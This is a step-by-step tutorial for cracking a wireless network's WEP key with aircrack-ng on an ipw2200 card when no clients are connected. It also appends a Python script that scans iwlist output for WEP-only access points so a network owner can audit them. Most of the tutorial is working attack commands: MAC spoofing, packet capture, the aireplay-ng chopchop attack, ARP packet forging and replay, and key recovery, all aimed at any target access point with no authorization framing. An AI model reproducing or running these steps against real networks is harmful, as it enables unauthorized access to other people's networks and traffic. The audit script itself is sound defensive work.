Tutorial: WEP Crack / No Clients / IPW2200 (Centrino)

I know there are already about a thousand tutorials, but I couldn’t find anything complete or up-to-date (or in English). Also, please bear in mind that this is my first tutorial.

Before we begin the attack, we need to update and get some information. First update aircrack-ng to the latest version (0.9.1 for me).

I saved to a USB flash:
mount /dev/sda1 /mnt/sda_removable
cp /mnt/sda_removable/aircrack-ng-0.9.1.tar.gz ~

Or configure a network adaptor and d/l it (change X’s):
wget hXXp://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz

tar zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make install

We will also need to know the target’s name (ESSID), MAC address, and channel. Please note that my wireless device is “eth1” but yours may be different; use “iwconfig” to find out which adaptor is wireless. (If you downloaded aircrack-ng you may need to reset your network adaptor.)
iwlist eth1 scan

Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.
rmmod ipw2200
modprobe ipw2200 rtap_iface=1

Next enable wireless and change MAC (changing MAC is optional).
ifconfig eth1 up hw ether 00:11:22:33:44:55

Configure wireless w/ essid, channel, and a fake key.
iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed

Now start collecting traffic on rtap0. “dump” is the name of the capture (.cap) file.
airodump-ng --bssid <AP MAC> -w dump rtap0

Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier “-i rtap0”. This tells aireplay to use rtap0 for listening and eth1 for injecting. Also, “-4” is the type of attack (chopchop).
aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1

A prompt will ask you to use “this” packet. Type “y” and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream (.xor) file. The keystream file will look something like “replay_dec-######.xor”.

Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn’t start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn’t match. I just re-ran aireplay and it was fine.

Now we will create an arp-request packet using the acquired keystream file. The “-l” and “-k” options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP), but the attack runs faster if it is an arbitrary IP.
packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request

Finally we will send our newly created arp-request packet over and over. After this step you should see the “Data” count begin to rise quickly back in the first terminal (airodump). If the data count doesn’t rise (usually by between 80 and 350 per second) then something is wrong.
aireplay-ng -2 -r arp-request eth1

Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.
aircrack-ng -z dump*.cap

I hope this tutorial has proven helpful.

Tested on my Dell Inspiron 6000 (Centrino), 1.2 GB RAM.
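
The “iwlist eth1 scan” step above shows the ESSID, MAC address and channel of each access point; the same output also tells a network owner which of their own access points are still WEP-only and need moving to WPA2. The Python below is an added example, not part of the original tutorial: it classifies each cell of a scan, and the sample scan text, its ESSIDs and its MAC addresses are constructed.

```python
import re

# Constructed sample of `iwlist <iface> scan` output (not from a real network).
SAMPLE_SCAN = """\
eth1      Scan completed :
          Cell 01 - Address: 00:AA:BB:CC:DD:01
                    ESSID:"lab-legacy"
                    Channel:6
                    Encryption key:on
          Cell 02 - Address: 00:AA:BB:CC:DD:02
                    ESSID:"lab-wpa2"
                    Frequency:2.462 GHz (Channel 11)
                    Encryption key:on
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 03 - Address: 00:AA:BB:CC:DD:03
                    ESSID:"lab-open"
                    Channel:1
                    Encryption key:off
"""

def parse_scan(text):
    """Split iwlist scan output into one dict per cell (access point)."""
    cells = []
    for line in map(str.strip, text.splitlines()):
        m = re.match(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})", line)
        ap = cells[-1] if cells else {}  # lines before the first cell are discarded
        if m:
            cells.append({"bssid": m.group(1).upper(), "essid": "",
                          "channel": None, "privacy": False, "wpa": False})
        elif line.startswith("ESSID:"):
            ap["essid"] = line[len("ESSID:"):].strip('"')
        elif (m := re.search(r"Channel[: ](\d+)", line)):
            ap["channel"] = int(m.group(1))
        elif line.startswith("Encryption key:"):
            ap["privacy"] = line.endswith("on")
        elif line.startswith("IE:") and ("WPA" in line or "802.11i" in line):
            ap["wpa"] = True
    return cells

def classify(ap):
    """Encryption on with no WPA/WPA2 element advertised means WEP-only."""
    if not ap["privacy"]:
        return "open"
    return "wpa" if ap["wpa"] else "wep"

def wep_networks(text):
    return [ap for ap in parse_scan(text) if classify(ap) == "wep"]

print([(ap["essid"], ap["bssid"], ap["channel"]) for ap in wep_networks(SAMPLE_SCAN)])
```

To audit live output, pass the text of “iwlist eth1 scan” to wep_networks() in place of SAMPLE_SCAN.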
